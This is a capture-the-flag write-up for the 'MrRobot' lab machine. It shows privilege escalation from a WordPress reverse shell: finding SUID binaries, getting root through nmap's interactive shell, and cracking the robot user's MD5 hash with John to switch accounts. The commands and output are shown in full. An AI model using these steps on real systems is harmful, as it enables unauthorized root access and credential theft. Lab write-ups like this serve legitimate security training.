MrRobot
Privilege Escalation
- We can catch the Reverse Shell from
WordPress
Usingnetcat
daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
- The /usr/local/bin/nmap Binary has the SUID Bit Set.
daemon@linux ~$ find / -type f -perm -04000 -ls 2>/dev/null
...
34835 496 -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
...
- Using NMAP to Escalate Privileges.
daemon@linux ~$ /usr/local/bin/nmap --interactive
nmap> !sh
daemon@linux ~$ id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
daemon@linux ~$ whoami
root
OTHER [ROBOT MD5 HASH]
- In the Home Directory of the User robot there is an
MD5
HASH.
daemon@linux ~$ ls -l /home/robot/
...
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
...
daemon@linux ~$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
JOHN
- We can Brute-Force the HASH using
John
- Password: abcdefghijklmnopqrstuvwxyz
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
abcdefghijklmnopqrstuvwxyz (?)
Switching User
- After Cracking the
HASH
we can change our User toRobot
- Username - Password: robot:abcdefghijklmnopqrstuvwxyz
robot@linux ~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)